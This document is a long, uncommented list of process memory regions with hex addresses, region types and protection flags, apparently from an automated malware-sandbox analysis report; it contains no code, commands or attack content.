7FF848BF0000
|
trusted library allocation
|
page execute and read and write
|
||
21CAFD90000
|
heap
|
page read and write
|
||
20A2A67E000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
1F55AC38000
|
heap
|
page read and write
|
||
2078FBC3000
|
trusted library allocation
|
page read and write
|
||
DCF000
|
heap
|
page read and write
|
||
1EBC1B2D000
|
heap
|
page read and write
|
||
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
20970B62000
|
heap
|
page read and write
|
||
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
1D3943BA000
|
trusted library allocation
|
page read and write
|
||
2095897B000
|
trusted library allocation
|
page read and write
|
||
1D392B10000
|
trusted library allocation
|
page read and write
|
||
20A283D3000
|
heap
|
page read and write
|
||
20958DDB000
|
trusted library allocation
|
page read and write
|
||
20958DB2000
|
trusted library allocation
|
page read and write
|
||
20956700000
|
heap
|
page read and write
|
||
7FF848D45000
|
trusted library allocation
|
page read and write
|
||
2569DCBD000
|
heap
|
page read and write
|
||
BCD000
|
trusted library allocation
|
page execute and read and write
|
||
1D3A2E78000
|
trusted library allocation
|
page read and write
|
||
7A0AC3000
|
stack
|
page read and write
|
||
3552AFB000
|
stack
|
page read and write
|
||
20F6DE72000
|
heap
|
page read and write
|
||
256B7E9B000
|
heap
|
page read and write
|
||
E2B670F000
|
stack
|
page read and write
|
||
1504000
|
trusted library allocation
|
page read and write
|
||
2078DA70000
|
heap
|
page read and write
|
||
1F540C40000
|
heap
|
page read and write
|
||
DBE544C000
|
stack
|
page read and write
|
||
1F5437A6000
|
trusted library allocation
|
page read and write
|
||
C10000
|
trusted library allocation
|
page read and write
|
||
21CAFF10000
|
heap
|
page read and write
|
||
1F55ACB6000
|
heap
|
page read and write
|
||
256A0BD7000
|
trusted library allocation
|
page read and write
|
||
20A422F2000
|
heap
|
page read and write
|
||
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
7FF848D52000
|
trusted library allocation
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
60ED000
|
stack
|
page read and write
|
||
7FF848F7C000
|
trusted library allocation
|
page read and write
|
||
1510000
|
trusted library allocation
|
page read and write
|
||
2078F73A000
|
trusted library allocation
|
page read and write
|
||
256A077F000
|
trusted library allocation
|
page read and write
|
||
5044000
|
trusted library allocation
|
page read and write
|
||
256B7FCC000
|
heap
|
page read and write
|
||
5EA0000
|
trusted library allocation
|
page execute and read and write
|
||
1EBBFEC8000
|
heap
|
page read and write
|
||
FF4000
|
trusted library allocation
|
page read and write
|
||
7FF848D12000
|
trusted library allocation
|
page read and write
|
||
1D3911DE000
|
heap
|
page read and write
|
||
1000000
|
heap
|
page execute and read and write
|
||
21CAFD94000
|
heap
|
page read and write
|
||
F01087B000
|
stack
|
page read and write
|
||
20958DCC000
|
trusted library allocation
|
page read and write
|
||
7FF848C26000
|
trusted library allocation
|
page execute and read and write
|
||
E2B6BFB000
|
stack
|
page read and write
|
||
1F5428EF000
|
trusted library allocation
|
page read and write
|
||
1D391350000
|
heap
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page execute and read and write
|
||
5039000
|
stack
|
page read and write
|
||
20A2838D000
|
heap
|
page read and write
|
||
29C0E7E000
|
stack
|
page read and write
|
||
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
1050000
|
trusted library allocation
|
page read and write
|
||
1D39437F000
|
trusted library allocation
|
page read and write
|
||
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
1E2ED9B0000
|
heap
|
page read and write
|
||
20F53FB0000
|
heap
|
page read and write
|
||
20958C26000
|
trusted library allocation
|
page read and write
|
||
1EBC1AD8000
|
heap
|
page read and write
|
||
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
1D3A2F6E000
|
trusted library allocation
|
page read and write
|
||
2078FC54000
|
trusted library allocation
|
page read and write
|
||
1F5422D0000
|
heap
|
page readonly
|
||
2078FC59000
|
trusted library allocation
|
page read and write
|
||
1E2D5D32000
|
trusted library allocation
|
page read and write
|
||
7FF848CE1000
|
trusted library allocation
|
page read and write
|
||
587D000
|
stack
|
page read and write
|
||
5C8E000
|
stack
|
page read and write
|
||
BFB000
|
trusted library allocation
|
page execute and read and write
|
||
256B7FDF000
|
heap
|
page read and write
|
||
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
2078F5C0000
|
trusted library allocation
|
page read and write
|
||
3100000
|
trusted library allocation
|
page read and write
|
||
613B000
|
heap
|
page read and write
|
||
1EBBFC8E000
|
heap
|
page read and write
|
||
1D3A2E5A000
|
trusted library allocation
|
page read and write
|
||
12F7000
|
stack
|
page read and write
|
||
1E2ED82F000
|
heap
|
page read and write
|
||
209567BA000
|
heap
|
page read and write
|
||
1F552710000
|
trusted library allocation
|
page read and write
|
||
1EBC1AAB000
|
heap
|
page read and write
|
||
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
7FF848C16000
|
trusted library allocation
|
page execute and read and write
|
||
1D3911E9000
|
heap
|
page read and write
|
||
1F55AC91000
|
heap
|
page read and write
|
||
1D394736000
|
trusted library allocation
|
page read and write
|
||
547F000
|
stack
|
page read and write
|
||
21CAFD95000
|
heap
|
page read and write
|
||
DBE43FE000
|
stack
|
page read and write
|
||
1F55AA68000
|
heap
|
page read and write
|
||
1EBC1CE5000
|
heap
|
page read and write
|
||
20F6DE7F000
|
heap
|
page read and write
|
||
1F5435F9000
|
trusted library allocation
|
page read and write
|
||
2078FBDE000
|
trusted library allocation
|
page read and write
|
||
1D3AB417000
|
heap
|
page read and write
|
||
20A29DB0000
|
heap
|
page read and write
|
||
D77000
|
trusted library allocation
|
page execute and read and write
|
||
20958D06000
|
trusted library allocation
|
page read and write
|
||
7FF848B60000
|
trusted library allocation
|
page read and write
|
||
D54000
|
trusted library allocation
|
page read and write
|
||
20958DA2000
|
trusted library allocation
|
page read and write
|
||
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
1EBC1B9E000
|
heap
|
page read and write
|
||
1F55A925000
|
heap
|
page read and write
|
||
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
7FF848C30000
|
trusted library allocation
|
page execute and read and write
|
||
20A28230000
|
heap
|
page read and write
|
||
2861000
|
trusted library allocation
|
page read and write
|
||
1EBC1FD4000
|
heap
|
page read and write
|
||
256B7D40000
|
heap
|
page read and write
|
||
1EBC1AB7000
|
heap
|
page read and write
|
||
256A0A2F000
|
trusted library allocation
|
page read and write
|
||
284E000
|
trusted library allocation
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
D30000
|
trusted library allocation
|
page read and write
|
||
256AFA4B000
|
trusted library allocation
|
page read and write
|
||
1D392CE1000
|
trusted library allocation
|
page read and write
|
||
4A2D000
|
stack
|
page read and write
|
||
1EBBFB70000
|
heap
|
page read and write
|
||
7FF848B32000
|
trusted library allocation
|
page read and write
|
||
7FF848BE6000
|
trusted library allocation
|
page read and write
|
||
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
20A2A62E000
|
trusted library allocation
|
page read and write
|
||
1F542310000
|
trusted library allocation
|
page read and write
|
||
F010103000
|
stack
|
page read and write
|
||
20A2AA17000
|
trusted library allocation
|
page read and write
|
||
DD94F2D000
|
stack
|
page read and write
|
||
1D393052000
|
trusted library allocation
|
page read and write
|
||
20F6E045000
|
heap
|
page read and write
|
||
20958977000
|
trusted library allocation
|
page read and write
|
||
2078D7CB000
|
heap
|
page read and write
|
||
E2B6CFD000
|
stack
|
page read and write
|
||
20A3A17C000
|
trusted library allocation
|
page read and write
|
||
207A79C0000
|
heap
|
page read and write
|
||
20958968000
|
trusted library allocation
|
page read and write
|
||
20A2A21A000
|
trusted library allocation
|
page read and write
|
||
207A7B1A000
|
heap
|
page read and write
|
||
1EBBFECB000
|
heap
|
page read and write
|
||
D4B000
|
heap
|
page read and write
|
||
1EBC1B2C000
|
heap
|
page read and write
|
||
1D3AB11B000
|
heap
|
page read and write
|
||
7FF848C20000
|
trusted library allocation
|
page execute and read and write
|
||
2C0555B0000
|
heap
|
page read and write
|
||
D44000
|
trusted library allocation
|
page read and write
|
||
2078FA5D000
|
trusted library allocation
|
page read and write
|
||
1EBBFC80000
|
heap
|
page read and write
|
||
7FF848B90000
|
trusted library allocation
|
page read and write
|
||
1520000
|
trusted library allocation
|
page read and write
|
||
7FF848B73000
|
trusted library allocation
|
page execute and read and write
|
||
209588FC000
|
trusted library allocation
|
page read and write
|
||
1D3943FD000
|
trusted library allocation
|
page read and write
|
||
1EBC1CF4000
|
heap
|
page read and write
|
||
1EBC1FD8000
|
heap
|
page read and write
|
||
2078F7C5000
|
trusted library allocation
|
page read and write
|
||
1E2D5070000
|
heap
|
page read and write
|
||
7FF848E94000
|
trusted library allocation
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
20F53E2C000
|
heap
|
page read and write
|
||
2078D690000
|
heap
|
page read and write
|
||
D40000
|
heap
|
page read and write
|
||
1E2D5B63000
|
trusted library allocation
|
page read and write
|
||
1D391320000
|
trusted library allocation
|
page read and write
|
||
51A3000
|
heap
|
page execute and read and write
|
||
1F552421000
|
trusted library allocation
|
page read and write
|
||
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
7FF848C26000
|
trusted library allocation
|
page read and write
|
||
20A423B0000
|
heap
|
page read and write
|
||
20958D92000
|
trusted library allocation
|
page read and write
|
||
B87DEFF000
|
stack
|
page read and write
|
||
7FF848C16000
|
trusted library allocation
|
page read and write
|
||
7A10F9000
|
stack
|
page read and write
|
||
1D3911AA000
|
heap
|
page read and write
|
||
1EBC1AFD000
|
heap
|
page read and write
|
||
6DC0000
|
heap
|
page read and write
|
||
B55000
|
heap
|
page read and write
|
||
1E2D5420000
|
trusted library allocation
|
page read and write
|
||
3B01000
|
trusted library allocation
|
page read and write
|
||
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
DBE53CC000
|
stack
|
page read and write
|
||
7FF848C16000
|
trusted library allocation
|
page read and write
|
||
1D39479A000
|
trusted library allocation
|
page read and write
|
||
172F000
|
stack
|
page read and write
|
||
4FEC000
|
stack
|
page read and write
|
||
7A12B8000
|
stack
|
page read and write
|
||
DBE47FE000
|
stack
|
page read and write
|
||
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
2C055660000
|
heap
|
page read and write
|
||
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
4898000
|
trusted library allocation
|
page read and write
|
||
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
7DF4E04B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
2569F670000
|
trusted library allocation
|
page read and write
|
||
1EBC1CD1000
|
heap
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
2A0E000
|
stack
|
page read and write
|
||
2569DDC0000
|
trusted library allocation
|
page read and write
|
||
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
1EBC1AFC000
|
heap
|
page read and write
|
||
D7B000
|
trusted library allocation
|
page execute and read and write
|
||
20A423D0000
|
heap
|
page read and write
|
||
2078D803000
|
heap
|
page read and write
|
||
7DF4E04A0000
|
trusted library allocation
|
page execute and read and write
|
||
20957FD0000
|
heap
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page read and write
|
||
155D000
|
heap
|
page read and write
|
||
B87E33E000
|
stack
|
page read and write
|
||
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
F010AFE000
|
stack
|
page read and write
|
||
B87DE75000
|
stack
|
page read and write
|
||
7FF848C10000
|
trusted library allocation
|
page read and write
|
||
256A1350000
|
trusted library allocation
|
page read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
D74000
|
heap
|
page read and write
|
||
20F53CD0000
|
heap
|
page read and write
|
||
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
2AD0000
|
trusted library allocation
|
page read and write
|
||
1F5408A3000
|
heap
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
20958DCA000
|
trusted library allocation
|
page read and write
|
||
7FF848B34000
|
trusted library allocation
|
page read and write
|
||
29C0FFB000
|
stack
|
page read and write
|
||
1D3948BC000
|
trusted library allocation
|
page read and write
|
||
CF0000
|
heap
|
page read and write
|
||
E2B6AFE000
|
stack
|
page read and write
|
||
35524FF000
|
stack
|
page read and write
|
||
FE0000
|
trusted library allocation
|
page read and write
|
||
D30000
|
trusted library allocation
|
page read and write
|
||
1F543425000
|
trusted library allocation
|
page read and write
|
||
20A2A67A000
|
trusted library allocation
|
page read and write
|
||
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
2569DDE0000
|
trusted library allocation
|
page read and write
|
||
B87DF7F000
|
stack
|
page read and write
|
||
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
5D30000
|
heap
|
page read and write
|
||
20A424B4000
|
heap
|
page read and write
|
||
1F55270E000
|
trusted library allocation
|
page read and write
|
||
256A12F2000
|
trusted library allocation
|
page read and write
|
||
1F5422C0000
|
trusted library allocation
|
page read and write
|
||
20968861000
|
trusted library allocation
|
page read and write
|
||
20A28250000
|
heap
|
page read and write
|
||
1E2D5CE4000
|
trusted library allocation
|
page read and write
|
||
7DF478590000
|
trusted library allocation
|
page execute and read and write
|
||
1F55AC45000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
2079F735000
|
trusted library allocation
|
page read and write
|
||
1F5408E9000
|
heap
|
page read and write
|
||
20F65B01000
|
trusted library allocation
|
page read and write
|
||
1EBC1B9E000
|
heap
|
page read and write
|
||
1F552451000
|
trusted library allocation
|
page read and write
|
||
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
7FF848B80000
|
trusted library allocation
|
page read and write
|
||
7DF4785B0000
|
trusted library allocation
|
page execute and read and write
|
||
1F552709000
|
trusted library allocation
|
page read and write
|
||
7FF848C90000
|
trusted library allocation
|
page execute and read and write
|
||
1D3AB0B0000
|
heap
|
page read and write
|
||
20958E1D000
|
trusted library allocation
|
page read and write
|
||
20F65B10000
|
trusted library allocation
|
page read and write
|
||
1F55A987000
|
heap
|
page execute and read and write
|
||
F0108F8000
|
stack
|
page read and write
|
||
7A14BE000
|
stack
|
page read and write
|
||
3B05000
|
trusted library allocation
|
page read and write
|
||
922CD8C000
|
stack
|
page read and write
|
||
FAE000
|
stack
|
page read and write
|
||
BD575FE000
|
stack
|
page read and write
|
||
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
20958D8A000
|
trusted library allocation
|
page read and write
|
||
2C055925000
|
heap
|
page read and write
|
||
B87F14D000
|
stack
|
page read and write
|
||
29C0B7F000
|
stack
|
page read and write
|
||
922BE36000
|
stack
|
page read and write
|
||
1490000
|
heap
|
page read and write
|
||
E2B6A7F000
|
stack
|
page read and write
|
||
BD574FE000
|
stack
|
page read and write
|
||
7FF848D11000
|
trusted library allocation
|
page read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
1EBBFE20000
|
heap
|
page read and write
|
||
20A2A146000
|
trusted library allocation
|
page read and write
|
||
20F55AF0000
|
heap
|
page execute and read and write
|
||
1E2D585B000
|
trusted library allocation
|
page read and write
|
||
20F6DE40000
|
heap
|
page read and write
|
||
1EBC1BA3000
|
heap
|
page read and write
|
||
7FF848B7D000
|
trusted library allocation
|
page execute and read and write
|
||
1F55A88E000
|
heap
|
page read and write
|
||
BD579FE000
|
stack
|
page read and write
|
||
922C0BC000
|
stack
|
page read and write
|
||
2078D7EF000
|
heap
|
page read and write
|
||
1EBC1CE0000
|
heap
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page execute and read and write
|
||
1D3943E9000
|
trusted library allocation
|
page read and write
|
||
2569DDD0000
|
heap
|
page readonly
|
||
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
1D394981000
|
trusted library allocation
|
page read and write
|
||
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
1F543451000
|
trusted library allocation
|
page read and write
|
||
1D3911FF000
|
heap
|
page read and write
|
||
7FF848C20000
|
trusted library allocation
|
page read and write
|
||
20F53E73000
|
heap
|
page read and write
|
||
256B7F11000
|
heap
|
page read and write
|
||
20958DAE000
|
trusted library allocation
|
page read and write
|
||
1D3931F0000
|
trusted library allocation
|
page read and write
|
||
1EBC1B0E000
|
heap
|
page read and write
|
||
E2B6D79000
|
stack
|
page read and write
|
||
7FF848CD0000
|
trusted library allocation
|
page read and write
|
||
20A2A663000
|
trusted library allocation
|
page read and write
|
||
20A2A111000
|
trusted library allocation
|
page read and write
|
||
2078D700000
|
heap
|
page read and write
|
||
5A4E000
|
stack
|
page read and write
|
||
1E2D586C000
|
trusted library allocation
|
page read and write
|
||
B87E0FE000
|
stack
|
page read and write
|
||
7FF848D24000
|
trusted library allocation
|
page read and write
|
||
1E2D5AA1000
|
trusted library allocation
|
page read and write
|
||
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
1E2E5750000
|
trusted library allocation
|
page read and write
|
||
5724000
|
trusted library allocation
|
page read and write
|
||
DB6000
|
heap
|
page read and write
|
||
2569DDA0000
|
trusted library allocation
|
page read and write
|
||
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
20970946000
|
heap
|
page read and write
|
||
F01067F000
|
stack
|
page read and write
|
||
256B7EDB000
|
heap
|
page read and write
|
||
20A2A20D000
|
trusted library allocation
|
page read and write
|
||
20F55793000
|
trusted library allocation
|
page read and write
|
||
2078F5D0000
|
heap
|
page read and write
|
||
7FF848B70000
|
trusted library allocation
|
page read and write
|
||
7FF848E73000
|
trusted library allocation
|
page read and write
|
||
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
256B7ECF000
|
heap
|
page read and write
|
||
1E2D5400000
|
trusted library allocation
|
page read and write
|
||
1EBC1CD8000
|
heap
|
page read and write
|
||
7FF848D1A000
|
trusted library allocation
|
page read and write
|
||
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
DBE487D000
|
stack
|
page read and write
|
||
7FF848D60000
|
trusted library allocation
|
page execute and read and write
|
||
1EBC1D04000
|
heap
|
page read and write
|
||
1EBBFECE000
|
heap
|
page read and write
|
||
1E2ED740000
|
heap
|
page read and write
|
||
1D3AB182000
|
heap
|
page read and write
|
||
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
D00000
|
heap
|
page read and write
|
||
20958D83000
|
trusted library allocation
|
page read and write
|
||
1EBC1B2C000
|
heap
|
page read and write
|
||
20F6DF27000
|
heap
|
page read and write
|
||
1EBC1FD8000
|
heap
|
page read and write
|
||
2078FF8E000
|
trusted library allocation
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
2078FC51000
|
trusted library allocation
|
page read and write
|
||
1EBC1B2C000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
1D3AB580000
|
trusted library section
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
5190000
|
heap
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
2F1F000
|
unkown
|
page read and write
|
||
7FF848C46000
|
trusted library allocation
|
page execute and read and write
|
||
2079F78C000
|
trusted library allocation
|
page read and write
|
||
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
7FF848FBD000
|
trusted library allocation
|
page read and write
|
||
5069000
|
trusted library allocation
|
page read and write
|
||
14E0000
|
trusted library allocation
|
page read and write
|
||
1E2ED758000
|
heap
|
page read and write
|
||
2078FBF9000
|
trusted library allocation
|
page read and write
|
||
284B000
|
trusted library allocation
|
page read and write
|
||
20F6DF40000
|
heap
|
page read and write
|
||
591E000
|
stack
|
page read and write
|
||
20F53E77000
|
heap
|
page read and write
|
||
BD5850E000
|
stack
|
page read and write
|
||
1D39305D000
|
trusted library allocation
|
page read and write
|
||
D50000
|
trusted library allocation
|
page read and write
|
||
256A1269000
|
trusted library allocation
|
page read and write
|
||
207A787D000
|
heap
|
page read and write
|
||
20A3A1F9000
|
trusted library allocation
|
page read and write
|
||
2078F6E3000
|
trusted library allocation
|
page read and write
|
||
7FF848C56000
|
trusted library allocation
|
page execute and read and write
|
||
2079F75B000
|
trusted library allocation
|
page read and write
|
||
1F544247000
|
trusted library allocation
|
page read and write
|
||
2096894C000
|
trusted library allocation
|
page read and write
|
||
1E2ED8B0000
|
heap
|
page read and write
|
||
20968870000
|
trusted library allocation
|
page read and write
|
||
1D3A2E11000
|
trusted library allocation
|
page read and write
|
||
1D3A2C86000
|
trusted library allocation
|
page read and write
|
||
BD5767F000
|
stack
|
page read and write
|
||
1D392B40000
|
trusted library allocation
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page execute and read and write
|
||
BD5757B000
|
stack
|
page read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
1D39474B000
|
trusted library allocation
|
page read and write
|
||
1F55A980000
|
heap
|
page execute and read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
1D392C30000
|
heap
|
page execute and read and write
|
||
BE0000
|
trusted library allocation
|
page read and write
|
||
7FF848D02000
|
trusted library allocation
|
page read and write
|
||
29C09FC000
|
stack
|
page read and write
|
||
1D3A2CAB000
|
trusted library allocation
|
page read and write
|
||
20970BD5000
|
heap
|
page read and write
|
||
1EBBFECE000
|
heap
|
page read and write
|
||
BD57AFB000
|
stack
|
page read and write
|
||
7FF848B7B000
|
trusted library allocation
|
page read and write
|
||
7FF848D30000
|
trusted library allocation
|
page read and write
|
||
20958DEB000
|
trusted library allocation
|
page read and write
|
||
1E2D5CB0000
|
trusted library allocation
|
page read and write
|
||
256A0A03000
|
trusted library allocation
|
page read and write
|
||
1EBBFD33000
|
heap
|
page read and write
|
||
2D1D000
|
trusted library allocation
|
page read and write
|
||
7A1F8D000
|
stack
|
page read and write
|
||
256B7F5A000
|
heap
|
page read and write
|
||
256AFA21000
|
trusted library allocation
|
page read and write
|
||
7FF848D40000
|
trusted library allocation
|
page execute and read and write
|
||
20F57393000
|
trusted library allocation
|
page read and write
|
||
1EBC1CC5000
|
heap
|
page read and write
|
||
1E2D5798000
|
trusted library allocation
|
page read and write
|
||
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
DBE477E000
|
stack
|
page read and write
|
||
20A29D70000
|
heap
|
page execute and read and write
|
||
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
20F573ED000
|
trusted library allocation
|
page read and write
|
||
7FF848D50000
|
trusted library allocation
|
page execute and read and write
|
||
256A1822000
|
trusted library allocation
|
page read and write
|
||
922BC76000
|
stack
|
page read and write
|
||
1EBC1B36000
|
heap
|
page read and write
|
||
2078D7E3000
|
heap
|
page read and write
|
||
2095889E000
|
trusted library allocation
|
page read and write
|
||
20F6E040000
|
heap
|
page read and write
|
||
1EBBFD1A000
|
heap
|
page read and write
|
||
20F6E066000
|
heap
|
page read and write
|
||
20958DB9000
|
trusted library allocation
|
page read and write
|
||
256AFCEE000
|
trusted library allocation
|
page read and write
|
||
1F55A42A000
|
heap
|
page read and write
|
||
1D3A2EB6000
|
trusted library allocation
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
20958820000
|
trusted library section
|
page read and write
|
||
1E2D38C5000
|
heap
|
page read and write
|
||
1F552490000
|
trusted library allocation
|
page read and write
|
||
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
BD578FE000
|
stack
|
page read and write
|
||
256B7D60000
|
heap
|
page read and write
|
||
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
2078F7FB000
|
trusted library allocation
|
page read and write
|
||
256AFA10000
|
trusted library allocation
|
page read and write
|
||
20958871000
|
trusted library allocation
|
page read and write
|
||
7FF848D14000
|
trusted library allocation
|
page read and write
|
||
7A0FFE000
|
stack
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
BD5858D000
|
stack
|
page read and write
|
||
1E2D575F000
|
trusted library allocation
|
page read and write
|
||
BEA000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
1EBC1B5E000
|
heap
|
page read and write
|
||
2078F801000
|
trusted library allocation
|
page read and write
|
||
C60000
|
heap
|
page read and write
|
||
35528FE000
|
stack
|
page read and write
|
||
922B753000
|
stack
|
page read and write
|
||
2AF0000
|
heap
|
page read and write
|
||
209588A6000
|
trusted library allocation
|
page read and write
|
||
E2B6FFF000
|
stack
|
page read and write
|
||
6ED0000
|
heap
|
page read and write
|
||
B10000
|
heap
|
page read and write
|
||
14F4000
|
trusted library allocation
|
page read and write
|
||
20A3A1C3000
|
trusted library allocation
|
page read and write
|
||
20F65CB4000
|
trusted library allocation
|
page read and write
|
||
7FF848D00000
|
trusted library allocation
|
page execute and read and write
|
||
1F544222000
|
trusted library allocation
|
page read and write
|
||
2569F6BF000
|
heap
|
page read and write
|
||
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
B50000
|
heap
|
page read and write
|
||
1EBBFD33000
|
heap
|
page read and write
|
||
DBE497B000
|
stack
|
page read and write
|
||
7FF848C20000
|
trusted library allocation
|
page execute and read and write
|
||
29C0A7F000
|
stack
|
page read and write
|
||
2AB5000
|
trusted library allocation
|
page read and write
|
||
1EBC1B6B000
|
heap
|
page read and write
|
||
1F542350000
|
heap
|
page read and write
|
||
20968959000
|
trusted library allocation
|
page read and write
|
||
20957FC0000
|
heap
|
page read and write
|
||
1D3AB3E4000
|
heap
|
page read and write
|
||
E2B6F7E000
|
stack
|
page read and write
|
||
20A2A9E4000
|
trusted library allocation
|
page read and write
|
||
1D3947B1000
|
trusted library allocation
|
page read and write
|
||
5890000
|
heap
|
page read and write
|
||
1F55A8F0000
|
heap
|
page read and write
|
||
2078F7AE000
|
trusted library allocation
|
page read and write
|
||
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
20956730000
|
heap
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
209688DD000
|
trusted library allocation
|
page read and write
|
||
2079F71D000
|
trusted library allocation
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
DBE4577000
|
stack
|
page read and write
|
||
1E2D5855000
|
trusted library allocation
|
page read and write
|
||
DBE42FE000
|
stack
|
page read and write
|
||
7FF848D22000
|
trusted library allocation
|
page read and write
|
||
2F7E000
|
stack
|
page read and write
|
||
4FF0000
|
heap
|
page read and write
|
||
20A3A1AB000
|
trusted library allocation
|
page read and write
|
||
52AE000
|
stack
|
page read and write
|
||
B87E17B000
|
stack
|
page read and write
|
||
209591AC000
|
trusted library allocation
|
page read and write
|
||
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
F010B7B000
|
stack
|
page read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
7FF848BF0000
|
trusted library allocation
|
page execute and read and write
|
||
20958974000
|
trusted library allocation
|
page read and write
|
||
B87DFFE000
|
stack
|
page read and write
|
||
20F55A10000
|
heap
|
page execute and read and write
|
||
7FF848B4D000
|
trusted library allocation
|
page execute and read and write
|
||
E2B7B8D000
|
stack
|
page read and write
|
||
5D10000
|
heap
|
page execute and read and write
|
||
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
1D3A2E24000
|
trusted library allocation
|
page read and write
|
||
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
20F558F0000
|
heap
|
page read and write
|
||
BD577F6000
|
stack
|
page read and write
|
||
BF7000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
2569DC00000
|
heap
|
page read and write
|
||
7FF848D10000
|
trusted library allocation
|
page execute and read and write
|
||
209587E0000
|
heap
|
page execute and read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
1740000
|
trusted library allocation
|
page read and write
|
||
2078FF6F000
|
trusted library allocation
|
page read and write
|
||
1D39323F000
|
trusted library allocation
|
page read and write
|
||
1D393216000
|
trusted library allocation
|
page read and write
|
||
20A3A1D9000
|
trusted library allocation
|
page read and write
|
||
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
7FF848CE2000
|
trusted library allocation
|
page read and write
|
||
A30000
|
heap
|
page read and write
|
||
207A7AB0000
|
heap
|
page read and write
|
||
20A3A1E9000
|
trusted library allocation
|
page read and write
|
||
1F5441FD000
|
trusted library allocation
|
page read and write
|
||
1D3A2F60000
|
trusted library allocation
|
page read and write
|
||
20958030000
|
heap
|
page read and write
|
||
20F6DE89000
|
heap
|
page read and write
|
||
54EE000
|
stack
|
page read and write
|
||
2569DE20000
|
heap
|
page execute and read and write
|
||
1E2ED802000
|
heap
|
page read and write
|
||
BDD000
|
trusted library allocation
|
page execute and read and write
|
||
2078D6A0000
|
heap
|
page read and write
|
||
20970980000
|
heap
|
page read and write
|
||
5746000
|
trusted library allocation
|
page read and write
|
||
1E2D38C0000
|
heap
|
page read and write
|
||
1E2D57DD000
|
trusted library allocation
|
page read and write
|
||
151A000
|
trusted library allocation
|
page execute and read and write
|
||
209588BE000
|
trusted library allocation
|
page read and write
|
||
FF0000
|
trusted library allocation
|
page read and write
|
||
1D391310000
|
heap
|
page readonly
|
||
1E2ED8A7000
|
heap
|
page execute and read and write
|
||
2569F981000
|
heap
|
page read and write
|
||
